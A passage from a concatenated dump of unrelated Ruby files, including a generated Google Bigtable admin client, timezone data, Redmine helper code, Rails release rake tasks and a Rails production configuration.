# page_size field. If a page_size is set in subsequent calls, it must match
# the page_size given in the first request.
# @param page_token [::String]
# The value of `next_page_token` returned by a previous call.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::PagedEnumerable<::Google::Cloud::Bigtable::Admin::V2::HotTablet>]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::PagedEnumerable<::Google::Cloud::Bigtable::Admin::V2::HotTablet>]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::ListHotTabletsRequest.new
#
# # Call the list_hot_tablets method.
# result = client.list_hot_tablets request
#
# # The returned object is of type Gapic::PagedEnumerable. You can
# # iterate over all elements by calling #each, and the enumerable
# # will lazily make API calls to fetch subsequent pages. Other
# # methods are also available for managing paging directly.
# result.each do |response|
# # Each element is of type ::Google::Cloud::Bigtable::Admin::V2::HotTablet.
# p response
# end
#
# Lists hot tablets in a cluster within the provided time range, ordered
# by CPU usage. Returns a lazily-paginating {::Gapic::PagedEnumerable}.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::ListHotTabletsRequest, ::Hash]
# @param options [::Gapic::CallOptions, ::Hash, nil]
def list_hot_tablets request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  # Coerce a plain Hash into the proper protobuf request message.
  request = ::Gapic::Protobuf.coerce request,
                                     to: ::Google::Cloud::Bigtable::Admin::V2::ListHotTabletsRequest

  # Normalize options (a Hash or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Assemble per-call gRPC metadata, seeded from the RPC-specific config.
  call_metadata = @config.rpcs.list_hot_tablets.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client(
    lib_name:      @config.lib_name,
    lib_version:   @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  )
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Build the implicit routing header from the request's resource name.
  routing_params = {}
  routing_params["parent"] = request.parent if request.parent
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |field, value| "#{field}=#{value}" }.join("&")

  # Layer defaults: RPC-specific settings first, then client-wide settings.
  options.apply_defaults timeout:      @config.rpcs.list_hot_tablets.timeout,
                         metadata:     call_metadata,
                         retry_policy: @config.rpcs.list_hot_tablets.retry_policy
  options.apply_defaults timeout:      @config.timeout,
                         metadata:     @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :list_hot_tablets, request, options: options do |response, operation|
    # Wrap the raw page response so iteration transparently fetches
    # subsequent pages on demand.
    response = ::Gapic::PagedEnumerable.new @bigtable_instance_admin_stub, :list_hot_tablets, request, response, operation, options
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => grpc_error
  raise ::Google::Cloud::Error.from_error(grpc_error)
end
##
# Configuration class for the BigtableInstanceAdmin API.
#
# This class represents the configuration for BigtableInstanceAdmin,
# providing control over timeouts, retry behavior, logging, transport
# parameters, and other low-level controls. Certain parameters can also be
# applied individually to specific RPCs. See
# {::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client::Configuration::Rpcs}
# for a list of RPCs that can be configured independently.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# @example
#
# # Modify the global config, setting the timeout for
# # create_instance to 20 seconds,
# # and all remaining timeouts to 10 seconds.
# ::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.configure do |config|
# config.timeout = 10.0
# config.rpcs.create_instance.timeout = 20.0
# end
#
# # Apply the above configuration only to a new client.
# client = ::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new do |config|
# config.timeout = 10.0
# config.rpcs.create_instance.timeout = 20.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"bigtableadmin.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`GRPC::Core::Channel`) a gRPC channel with included credentials
# * (`GRPC::Core::ChannelCredentials`) a gRPC credentials object
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] channel_args
# Extra parameters passed to the gRPC channel. Note: this is ignored if a
# `GRPC::Core::Channel` object is provided as the credential.
# @return [::Hash]
# @!attribute [rw] interceptors
# An array of interceptors that are run before calls are executed.
# @return [::Array<::GRPC::ClientInterceptor>]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
# @!attribute [rw] metadata
# Additional gRPC headers to be sent with the call.
# @return [::Hash{::Symbol=>::String}]
# @!attribute [rw] retry_policy
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
# @return [::Hash]
# @!attribute [rw] quota_project
# A separate project against which to charge quota.
# @return [::String]
#
class Configuration
  extend ::Gapic::Config

  # Service endpoint; override for private service connect, emulators, etc.
  config_attr :endpoint, "bigtableadmin.googleapis.com", ::String
  # Credentials may be given in several forms; the validation block accepts
  # any of the allowed credential types (gRPC channel types only when the
  # grpc library is actually loaded).
  config_attr :credentials, nil do |value|
    allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
    allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC
    allowed.any? { |klass| klass === value }
  end
  config_attr :scope, nil, ::String, ::Array, nil
  config_attr :lib_name, nil, ::String, nil
  config_attr :lib_version, nil, ::String, nil
  # Default channel args disable gRPC's own service-config resolution so the
  # client-library retry configuration is authoritative.
  config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil)
  config_attr :interceptors, nil, ::Array, nil
  config_attr :timeout, nil, ::Numeric, nil
  config_attr :metadata, nil, ::Hash, nil
  config_attr :retry_policy, nil, ::Hash, ::Proc, nil
  config_attr :quota_project, nil, ::String, nil

  # @private
  # Optionally chains to a parent configuration (unset attributes fall
  # through to the parent) and yields self for block-style configuration.
  def initialize parent_config = nil
    @parent_config = parent_config unless parent_config.nil?
    yield self if block_given?
  end

  ##
  # Configurations for individual RPCs
  # @return [Rpcs]
  #
  def rpcs
    # Memoized; inherits from the parent config's Rpcs when one is present.
    @rpcs ||= begin
      parent_rpcs = nil
      parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs)
      Rpcs.new parent_rpcs
    end
  end

  ##
  # Configuration RPC class for the BigtableInstanceAdmin API.
  #
  # Includes fields providing the configuration for each RPC in this service.
  # Each configuration object is of type `Gapic::Config::Method` and includes
  # the following configuration fields:
  #
  #  *  `timeout` (*type:* `Numeric`) - The call timeout in seconds
  #  *  `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers
  #  *  `retry_policy (*type:* `Hash`) - The retry policy. The policy fields
  #     include the following keys:
  #      *  `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
  #      *  `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
  #      *  `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
  #      *  `:retry_codes` (*type:* `Array<String>`) - The error codes that should
  #         trigger a retry.
  #
  class Rpcs
    ##
    # RPC-specific configuration for `create_instance`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :create_instance
    ##
    # RPC-specific configuration for `get_instance`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :get_instance
    ##
    # RPC-specific configuration for `list_instances`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :list_instances
    ##
    # RPC-specific configuration for `update_instance`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :update_instance
    ##
    # RPC-specific configuration for `partial_update_instance`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :partial_update_instance
    ##
    # RPC-specific configuration for `delete_instance`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :delete_instance
    ##
    # RPC-specific configuration for `create_cluster`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :create_cluster
    ##
    # RPC-specific configuration for `get_cluster`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :get_cluster
    ##
    # RPC-specific configuration for `list_clusters`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :list_clusters
    ##
    # RPC-specific configuration for `update_cluster`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :update_cluster
    ##
    # RPC-specific configuration for `partial_update_cluster`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :partial_update_cluster
    ##
    # RPC-specific configuration for `delete_cluster`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :delete_cluster
    ##
    # RPC-specific configuration for `create_app_profile`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :create_app_profile
    ##
    # RPC-specific configuration for `get_app_profile`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :get_app_profile
    ##
    # RPC-specific configuration for `list_app_profiles`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :list_app_profiles
    ##
    # RPC-specific configuration for `update_app_profile`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :update_app_profile
    ##
    # RPC-specific configuration for `delete_app_profile`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :delete_app_profile
    ##
    # RPC-specific configuration for `get_iam_policy`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :get_iam_policy
    ##
    # RPC-specific configuration for `set_iam_policy`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :set_iam_policy
    ##
    # RPC-specific configuration for `test_iam_permissions`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :test_iam_permissions
    ##
    # RPC-specific configuration for `list_hot_tablets`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :list_hot_tablets

    # @private
    # Builds one Gapic::Config::Method per RPC, each chained to the
    # corresponding method config on the parent Rpcs (when provided) so
    # unset per-RPC settings inherit from the parent configuration.
    def initialize parent_rpcs = nil
      create_instance_config = parent_rpcs.create_instance if parent_rpcs.respond_to? :create_instance
      @create_instance = ::Gapic::Config::Method.new create_instance_config
      get_instance_config = parent_rpcs.get_instance if parent_rpcs.respond_to? :get_instance
      @get_instance = ::Gapic::Config::Method.new get_instance_config
      list_instances_config = parent_rpcs.list_instances if parent_rpcs.respond_to? :list_instances
      @list_instances = ::Gapic::Config::Method.new list_instances_config
      update_instance_config = parent_rpcs.update_instance if parent_rpcs.respond_to? :update_instance
      @update_instance = ::Gapic::Config::Method.new update_instance_config
      partial_update_instance_config = parent_rpcs.partial_update_instance if parent_rpcs.respond_to? :partial_update_instance
      @partial_update_instance = ::Gapic::Config::Method.new partial_update_instance_config
      delete_instance_config = parent_rpcs.delete_instance if parent_rpcs.respond_to? :delete_instance
      @delete_instance = ::Gapic::Config::Method.new delete_instance_config
      create_cluster_config = parent_rpcs.create_cluster if parent_rpcs.respond_to? :create_cluster
      @create_cluster = ::Gapic::Config::Method.new create_cluster_config
      get_cluster_config = parent_rpcs.get_cluster if parent_rpcs.respond_to? :get_cluster
      @get_cluster = ::Gapic::Config::Method.new get_cluster_config
      list_clusters_config = parent_rpcs.list_clusters if parent_rpcs.respond_to? :list_clusters
      @list_clusters = ::Gapic::Config::Method.new list_clusters_config
      update_cluster_config = parent_rpcs.update_cluster if parent_rpcs.respond_to? :update_cluster
      @update_cluster = ::Gapic::Config::Method.new update_cluster_config
      partial_update_cluster_config = parent_rpcs.partial_update_cluster if parent_rpcs.respond_to? :partial_update_cluster
      @partial_update_cluster = ::Gapic::Config::Method.new partial_update_cluster_config
      delete_cluster_config = parent_rpcs.delete_cluster if parent_rpcs.respond_to? :delete_cluster
      @delete_cluster = ::Gapic::Config::Method.new delete_cluster_config
      create_app_profile_config = parent_rpcs.create_app_profile if parent_rpcs.respond_to? :create_app_profile
      @create_app_profile = ::Gapic::Config::Method.new create_app_profile_config
      get_app_profile_config = parent_rpcs.get_app_profile if parent_rpcs.respond_to? :get_app_profile
      @get_app_profile = ::Gapic::Config::Method.new get_app_profile_config
      list_app_profiles_config = parent_rpcs.list_app_profiles if parent_rpcs.respond_to? :list_app_profiles
      @list_app_profiles = ::Gapic::Config::Method.new list_app_profiles_config
      update_app_profile_config = parent_rpcs.update_app_profile if parent_rpcs.respond_to? :update_app_profile
      @update_app_profile = ::Gapic::Config::Method.new update_app_profile_config
      delete_app_profile_config = parent_rpcs.delete_app_profile if parent_rpcs.respond_to? :delete_app_profile
      @delete_app_profile = ::Gapic::Config::Method.new delete_app_profile_config
      get_iam_policy_config = parent_rpcs.get_iam_policy if parent_rpcs.respond_to? :get_iam_policy
      @get_iam_policy = ::Gapic::Config::Method.new get_iam_policy_config
      set_iam_policy_config = parent_rpcs.set_iam_policy if parent_rpcs.respond_to? :set_iam_policy
      @set_iam_policy = ::Gapic::Config::Method.new set_iam_policy_config
      test_iam_permissions_config = parent_rpcs.test_iam_permissions if parent_rpcs.respond_to? :test_iam_permissions
      @test_iam_permissions = ::Gapic::Config::Method.new test_iam_permissions_config
      list_hot_tablets_config = parent_rpcs.list_hot_tablets if parent_rpcs.respond_to? :list_hot_tablets
      @list_hot_tablets = ::Gapic::Config::Method.new list_hot_tablets_config
      yield self if block_given?
    end
  end
end
end
end
end
end
end
end
end
| 55.567274 | 156 | 0.552663 |
bb7242c1e15e7375fb028403371732906a0e02f2 | 266 | FactoryBot.define do
factory :api_v3_ind_context_property, class: 'Api::V3::IndContextProperty' do
association :ind, factory: :api_v3_ind
association :context, factory: :api_v3_context
tooltip_text { 'Context specific tooltip text for IND' }
end
end
| 33.25 | 79 | 0.759398 |
bb40d5438e7a788eab1966cdcb0c0c0fa8b6f781 | 1,611 | namespace :cache do
desc "Delete all cache files."
task :clean => :require do
pat = SmallCage::CacheFilter::TARGET_PATTERN
list = FileList[pat]
list.each do |path|
to = path.pathmap("%{--latest$,-*}X%x")
outfiles = FileList[to]
outfiles = SmallCage::CacheFilter.outfiles(path, outfiles)
outfiles.each do |f|
puts "(cache)D #{f[0]}"
File.delete(f[0])
end
end
end
desc "Delete old cache files."
task :delete_old => :require do
pat = SmallCage::CacheFilter::TARGET_PATTERN
list = FileList[pat]
list.each do |path|
to = path.pathmap("%{--latest$,-*}X%x")
outfiles = FileList[to]
outfiles = SmallCage::CacheFilter.outfiles(path, outfiles)
outfiles.pop
outfiles.each do |f|
puts "(cache)D #{f[0]}"
File.delete(f[0])
end
end
end
task :require do
require File.dirname(__FILE__) + "/../filters/cache_filter.rb"
end
desc "Update *--latest.* files."
task :update => [:require] do
pat = SmallCage::CacheFilter::TARGET_PATTERN
# Fix filenames. (site--latest.css.smc -> site--latest.css -> site-123.css)
smclist = FileList["#{pat}.smc"]
system "smc update" unless smclist.empty?
list = FileList[pat]
SmallCage::CacheFilter.create_cache(list, ENV["DRYRUN"])
# Apply cache filter. Rewrite links. (site--latest.css.smc -> site--latest.css)
system "smc update"
# Copy updated file (site--latest.css -> site-123.css)
smclist = smclist.map {|f| f[0 .. -5]}
SmallCage::CacheFilter.create_cache(smclist, ENV["DRYRUN"])
end
end | 29.290909 | 83 | 0.624457 |
ffa20b63779cf9430e47cab8a2a6444326805d58 | 700 | # encoding: UTF-8
module TZInfo
  module Definitions
    module Antarctica
      # Generated timezone data for Antarctica/Davis.  Offsets: :zzz is
      # UTC+0 with no abbreviation; :DAVT appears at UTC+7 (25200s) and
      # UTC+5 (18000s).
      module Davis
        include TimezoneDefinition

        timezone 'Antarctica/Davis' do |tz|
          tz.offset :o0, 0, 0, :zzz
          tz.offset :o1, 25200, 0, :DAVT
          tz.offset :o2, 18000, 0, :DAVT

          # Transitions between the defined offsets; early entries use
          # rational timestamps, later ones plain epoch seconds.
          tz.transition 1957, 1, :o1, 4871703, 2
          tz.transition 1964, 10, :o0, 58528805, 24
          tz.transition 1969, 2, :o1, 4880507, 2
          tz.transition 2009, 10, :o2, 1255806000
          tz.transition 2010, 3, :o1, 1268251200
          tz.transition 2011, 10, :o2, 1319742000
          tz.transition 2012, 2, :o1, 1329854400
        end
      end
    end
  end
end
| 26.923077 | 51 | 0.56 |
f8bcadabcaab0115bee569a363a32b3d6b2ea21a | 117 | # frozen_string_literal: true
require_relative 'string_template/handler'
require_relative 'string_template/railtie'
| 23.4 | 42 | 0.863248 |
b9cfc0fa763ea80457037cb461f115468453c24d | 1,284 | require 'spec_helper'
require 'ionoscloud_backupunit_get'
Chef::Knife::IonoscloudBackupunitGet.load_deps
describe Chef::Knife::IonoscloudBackupunitGet do
  before :each do
    # NOTE(review): `subject { ... }` is an example-group-level DSL; calling
    # it inside a `before` hook does not redefine the subject.  The default
    # subject (described_class.new) happens to be the same object, so this
    # works by accident — confirm and consider moving it to group scope.
    subject { Chef::Knife::IonoscloudBackupunitGet.new }
    allow(subject).to receive(:puts)
    allow(subject).to receive(:print)
  end

  describe '#run' do
    it 'should call BackupUnitApi.backupunits_find_by_id' do
      backupunit = backupunit_mock
      subject_config = {
        ionoscloud_username: 'email',
        ionoscloud_password: 'password',
        backupunit_id: backupunit.id,
        yes: true,
      }

      subject_config.each { |key, value| subject.config[key] = value }

      # Expect the backup unit to be printed, with no long-running wait.
      check_backupunit_print(subject, backupunit)
      expect(subject.api_client).not_to receive(:wait_for)
      mock_call_api(
        subject,
        [
          {
            method: 'GET',
            path: "/backupunits/#{backupunit.id}",
            operation: :'BackupUnitApi.backupunits_find_by_id',
            return_type: 'BackupUnit',
            result: backupunit,
          },
        ],
      )

      expect { subject.run }.not_to raise_error(Exception)
    end

    it 'should not make any call if any required option is missing' do
      check_required_options(subject)
    end
  end
end
| 25.68 | 70 | 0.644081 |
4abde3737637d804f64d7381be807319aef808ff | 3,817 | module ExternalRelationItemsHelper
def relative_app_name
Redmine::Utils.relative_url_root.gsub(%r{^\/}, '')
end
def app_id_to_name(app_id)
if app_id == 1
app_name = relative_app_name()
else
app_name = ExternalRelationApp.find_by_id(app_id).app_name
end
app_name
end
def app_name_to_id(app_name)
if app_name == relative_app_name()
app_id = 1
else
app = ExternalRelationApp.find_by(app_name: app_name)
if app.nil?
app_id = 0
else
app_id = app.id
end
end
app_id
end
def app_id_to_title(app_id)
ExternalRelationApp.find_by_id(app_id).app_title
end
def get_table_from_another_app(app_name, params={}, symbolize=true)
require 'json'
require 'net/http'
require 'uri'
uri = URI(
request.protocol + request.host +
"/#{app_name}" + "/external_relations/items.json")
uri.query = params.to_param if params.length > 0
response = Net::HTTP.get_response(uri)
if response.code == '200'
return JSON.parse(response.body, symbolize_names: symbolize)
else
return nil
end
end
def get_table_from_another_apps(params={}, symbolize=true)
another_app_tables = {}
app_names = ExternalRelationApp.all.map{
|e| e.attributes.values
}.transpose[1][1..-1] # get array of app_name except for local
app_names.each do |app_name|
another_app_tables[app_name] = get_table_from_another_app(app_name, params, symbolize)
end
return another_app_tables
end
def abs_local_app_name(ex_rel_array)
ex_rel_array.keys.each { |app_name|
ex_rel_array[app_name].each { |items|
items[:issue_from_app_name] = app_name if items[:issue_from_app_id] == 1
items[:issue_to_app_name] = app_name if items[:issue_to_app_id] == 1
}
}
return ex_rel_array
end
def exchange_app_id(hash, app_name)
id = app_name_to_id(app_name)
return hash.each {|item|
if item[:issue_to_app_id] == 1
item[:issue_to_app_id] = id
item[:issue_to_app_name] = app_name
end
item[:issue_from_app_id] = 1 # local
}
end
def merge_another_table_hash(table_base, table_another)
table_new = table_base
table_another.keys.each{ |app_name|
table_new = table_new + exchange_app_id(table_another[app_name], app_name)
}
return table_new
end
def active_record_to_array_hash(active_record, symbolize=true)
if symbolize
return active_record.map{|e| e.attributes.symbolize_keys}
else
return active_record.map{|e| e.attributes}
end
end
def check_table(table_another)
logger.info(table_another)
table_another.keys.each{ |app_name|
return false if table_another[app_name].nil?
}
return true
end
def delete_item(ex_rel)
issue_to_app_name = app_id_to_name(ex_rel.issue_to_app_id)
issue_to_id = ex_rel.issue_to_id
deleted = ex_rel.destroy
if deleted
# update done_ratio in link_to issues
Thread.start do
call_update_issue_done_ratios(issue_to_app_name, [issue_to_id])
end
end
return deleted
end
def exrels_tabs
tabs = []
tabs << {
:name => 'link_to',
:label => :label_title_ex_rels_issue_to,
:partial => 'issues/tabs/exrels_table_to'}
tabs << {
:name => 'link_from',
:label => :label_title_ex_rels_issue_from,
:partial => 'issues/tabs/exrels_table_from'}
tabs
end
def link_to_break(ex_rel, data_type)
link_to '',
{ controller: 'external_relation_items', action: :destroy,
id: ex_rel[:id], ex_rel: ex_rel, data_type: data_type },
method: :delete, remote: true, class: 'icon icon-link-break',
data: { confirm: l(:text_are_you_sure) }, title: l(:label_link_break)
end
end
| 26.506944 | 92 | 0.674614 |
4a1ed04478acb328e80a89e9769ec3a891856ecd | 5,872 | FRAMEWORKS = %w( activesupport activemodel activerecord actionview actionpack activejob actionmailer actioncable railties )
# Repository root (this file lives one directory below it).
root    = File.expand_path('../../', __FILE__)
# Release version read from RAILS_VERSION, and the git tag derived from it.
version = File.read("#{root}/RAILS_VERSION").strip
tag     = "v#{version}"

directory "pkg"
# Per-framework packaging tasks: for each component gem (and the top-level
# rails gem) define clean / update_versions / build / install / push.
(FRAMEWORKS + ['rails']).each do |framework|
  namespace framework do
    gem = "pkg/#{framework}-#{version}.gem"
    gemspec = "#{framework}.gemspec"

    task :clean do
      rm_f gem
    end

    # Rewrite the MAJOR/MINOR/TINY/PRE constants in the framework's version
    # file (and package.json, if present) to match RAILS_VERSION.
    task :update_versions do
      glob = root.dup
      if framework == "rails"
        glob << "/version.rb"
      else
        glob << "/#{framework}/lib/*"
        glob << "/gem_version.rb"
      end

      file = Dir[glob].first
      ruby = File.read(file)

      major, minor, tiny, pre = version.split('.', 4)
      pre = pre ? pre.inspect : "nil"

      ruby.gsub!(/^(\s*)MAJOR(\s*)= .*?$/, "\\1MAJOR = #{major}")
      raise "Could not insert MAJOR in #{file}" unless $1

      ruby.gsub!(/^(\s*)MINOR(\s*)= .*?$/, "\\1MINOR = #{minor}")
      raise "Could not insert MINOR in #{file}" unless $1

      ruby.gsub!(/^(\s*)TINY(\s*)= .*?$/, "\\1TINY = #{tiny}")
      raise "Could not insert TINY in #{file}" unless $1

      ruby.gsub!(/^(\s*)PRE(\s*)= .*?$/, "\\1PRE = #{pre}")
      raise "Could not insert PRE in #{file}" unless $1

      File.open(file, 'w') { |f| f.write ruby }

      if File.exist?("#{framework}/package.json")
        Dir.chdir("#{framework}") do
          # This "npm-ifies" the current version:
          # npm rejects versions such as "5.0.0.rc1" or "5.0.0.beta1.1", so
          # they are transformed to "5.0.0-rc1" / "5.0.0-beta1-1" — every
          # "." at index >= 2 in the dot-separated version becomes a "-".
          version = version.gsub(/\./).with_index { |s, i| i >= 2 ? '-' : s }

          # Check if npm is installed, and raise an error if not
          if sh 'which npm'
            sh "npm version #{version} --no-git-tag-version"
          else
            raise 'You must have npm installed to release Rails.'
          end
        end
      end
    end

    # Build the .gem into pkg/ (component gems run their own rake package first).
    task gem => %w(update_versions pkg) do
      cmd = ""
      cmd << "cd #{framework} && " unless framework == "rails"
      cmd << "bundle exec rake package && " unless framework == "rails"
      cmd << "gem build #{gemspec} && mv #{framework}-#{version}.gem #{root}/pkg/"
      sh cmd
    end

    task :build => [:clean, gem]
    task :install => :build do
      sh "gem install --pre #{gem}"
    end

    # Publish to rubygems (and npm for frameworks that ship a package.json).
    task :push => :build do
      sh "gem push #{gem}"
      sh "npm publish" if File.exist?("#{framework}/package.json")
    end
  end
end
# Maintenance tasks for the per-framework CHANGELOG.md files.
namespace :changelog do
  # Prepend a fresh "## Rails <version> (<today>)" section to every changelog.
  task :header do
    (FRAMEWORKS + ['guides']).each do |fw|
      require 'date'
      fname = File.join fw, 'CHANGELOG.md'

      header = "## Rails #{version} (#{Date.today.strftime('%B %d, %Y')}) ##\n\n* No changes.\n\n\n"
      contents = header + File.read(fname)

      File.open(fname, 'wb') { |f| f.write contents }
    end
  end

  # Stamp today's date onto the top-most release heading.
  task :release_date do
    (FRAMEWORKS + ['guides']).each do |fw|
      require 'date'
      replace = "## Rails #{version} (#{Date.today.strftime('%B %d, %Y')}) ##\n"
      fname = File.join fw, 'CHANGELOG.md'

      contents = File.read(fname).sub(/^(## Rails .*)\n/, replace)
      File.open(fname, 'wb') { |f| f.write contents }
    end
  end

  # Print each framework's unreleased changelog entries to stdout.
  task :release_summary do
    (FRAMEWORKS + ['guides']).each do |fw|
      puts "## #{fw}"
      fname = File.join fw, 'CHANGELOG.md'
      contents = File.readlines fname
      contents.shift
      changes = []
      changes << contents.shift until contents.first =~ /^\*Rails \d+\.\d+\.\d+/
      puts changes.reject { |change| change.strip.empty? }.join
      puts
    end
  end
end
# Aggregate tasks that fan out across every framework gem, plus the release
# workflow itself (sanity checks, build, commit, tag, push).
namespace :all do
  task :build => FRAMEWORKS.map { |f| "#{f}:build" } + ['rails:build']
  task :update_versions => FRAMEWORKS.map { |f| "#{f}:update_versions" } + ['rails:update_versions']
  task :install => FRAMEWORKS.map { |f| "#{f}:install" } + ['rails:install']
  task :push => FRAMEWORKS.map { |f| "#{f}:push" } + ['rails:push']

  # Refuse to release from a dirty tree or over an existing tag
  # (set SKIP_TAG=1 to allow re-running after the tag exists).
  task :ensure_clean_state do
    unless `git status -s | grep -v 'RAILS_VERSION\\|CHANGELOG\\|Gemfile.lock'`.strip.empty?
      abort "[ABORTING] `git status` reports a dirty tree. Make sure all changes are committed"
    end

    unless ENV['SKIP_TAG'] || `git tag | grep '^#{tag}$'`.strip.empty?
      abort "[ABORTING] `git tag` shows that #{tag} already exists. Has this version already\n"\
            " been released? Git tagging can be skipped by setting SKIP_TAG=1"
    end
  end

  task :bundle do
    sh 'bundle check'
  end

  # Commit the version bump using a template the operator must edit to approve.
  task :commit do
    File.open('pkg/commit_message.txt', 'w') do |f|
      f.puts "# Preparing for #{version} release\n"
      f.puts
      f.puts "# UNCOMMENT THE LINE ABOVE TO APPROVE THIS COMMIT"
    end

    sh "git add . && git commit --verbose --template=pkg/commit_message.txt"
    rm_f "pkg/commit_message.txt"
  end

  # Create and push the signed release tag.
  task :tag do
    sh "git tag -s -m '#{tag} release' #{tag}"
    sh "git push --tags"
  end

  task :prep_release => %w(ensure_clean_state build)
  task :release => %w(ensure_clean_state build bundle commit tag push)
end | 33.363636 | 123 | 0.561308 |
4a8b4a20d4597880a51ec7d1a9a855d74f131b3d | 4,128 | EMAIL_ADDR = '[email protected]'
DEV_EMAIL = '[email protected]'
# SMTP credential is injected via the environment (EMAIL_KEY); never hard-coded.
EMAIL_PWD = ENV['EMAIL_KEY']
# Production feature flags (referenced throughout the app).
SEND_EMAILS = true      # actually deliver mail (see action_mailer settings below)
VIDEOS_ONLINE = true
FILTERING = true
ALLOW_SEARCH = true
SHOW_MENU = true
SHOW_DEBUG = false
CHECK_YOUTUBE = false
SHOW_ADMIN_FIELDS = true
# Production environment configuration.
Aiki::Application.configure do
  # Settings specified here will take precedence over those in config/application.rb.

  # Code is not reloaded between requests.
  config.cache_classes = true

  # Eager load code on boot. This eager loads most of Rails and
  # your application in memory, allowing both thread web servers
  # and those relying on copy on write to perform better.
  # Rake tasks automatically ignore this option for performance.
  config.eager_load = true

  # Full error reports are disabled and caching is turned on.
  config.consider_all_requests_local       = false
  config.action_controller.perform_caching = true

  # Enable Rack::Cache to put a simple HTTP cache in front of your application
  # Add `rack-cache` to your Gemfile before enabling this.
  # For large-scale production use, consider using a caching reverse proxy like nginx, varnish or squid.
  # config.action_dispatch.rack_cache = true

  # Disable Rails's static asset server (Apache or nginx will already do this).
  config.serve_static_assets = false

  # Compress JavaScripts and CSS.
  config.assets.js_compressor = :uglifier
  # config.assets.css_compressor = :sass

  # Do not fallback to assets pipeline if a precompiled asset is missed.
  config.assets.compile = false

  # Generate digests for assets URLs.
  config.assets.digest = true

  # Version of your assets, change this if you want to expire all your assets.
  config.assets.version = '1.0'

  # Specifies the header that your server uses for sending files.
  # config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache
  # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx

  # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
  # config.force_ssl = true

  # Set to :debug to see everything in the log.
  config.log_level = :info

  # Prepend all log lines with the following tags.
  # config.log_tags = [ :subdomain, :uuid ]

  # Use a different logger for distributed setups.
  # config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)

  # Use a different cache store in production.
  # config.cache_store = :mem_cache_store

  # Enable serving of images, stylesheets, and JavaScripts from an asset server.
  # config.action_controller.asset_host = "http://assets.example.com"

  # Precompile additional assets.
  # application.js, application.css, and all non-JS/CSS in app/assets folder are already added.
  # config.assets.precompile += %w( search.js )

